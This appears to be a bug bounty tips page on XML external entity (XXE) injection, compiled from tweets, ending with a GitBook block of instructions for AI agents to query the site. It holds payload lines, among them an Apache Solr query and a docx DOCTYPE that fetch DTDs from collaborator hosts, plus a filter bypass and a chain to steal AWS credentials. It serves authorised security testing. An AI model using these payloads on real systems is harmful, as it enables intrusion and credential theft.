# XXE

* [see an apache solr GET/POST to /select ? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='\<!DOCTYPE a SYSTEM "http://collab.burp.net">\<a>\</a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty](https://twitter.com/huntmost/status/1195507306919804928)
* [#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) to grab an SVG? Try & bypass it by embedding the SVG using the Data URI protocol handler \[data:image/svg+xml;base64,XXE\_PAYLOAD\], most of the time it would work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity](https://twitter.com/prateek_0490/status/1046077319801184259)
* <https://twitter.com/11xuxx/status/1250764273623629826>
* [XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip](https://twitter.com/HusseiN98D/status/1257825228341874689)
* [jobs.targ.com site fills in personal info by uploading cv & parsing. Accepted docx, pdf, etc. 1. Unzip docx & edit word/document.xml 3. Add \<!DOCTYPE foo \[\<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;\]> 3. Upload 4. Profit! #BugBounty](https://twitter.com/huntmost/status/1180649484759572480)
* [#BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on@Burp\_Suite to do achieve this!](https://twitter.com/HusseiN98D/status/1219750207287676933)

![https://twitter.com/Kei0x/status/1172267556226445313](/files/-MMtq130yvZdlpa7onJE)

* [XXE](https://twitter.com/11xuxx/status/1250764273623629826?s=20)

  1. [change password func -> JSON](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  2. [converted to XML -> 200 OK](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  3. [created dtd file on my ec2 and started webserver on port 80](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  4. [crafted a XXE payload!](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  5. [bounty!](https://twitter.com/11xuxx/status/1250764273623629826?s=20)

  [Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.](https://twitter.com/11xuxx/status/1250764273623629826?s=20)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gowsundar.gitbook.io/book-of-bugbounty-tips/xxe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.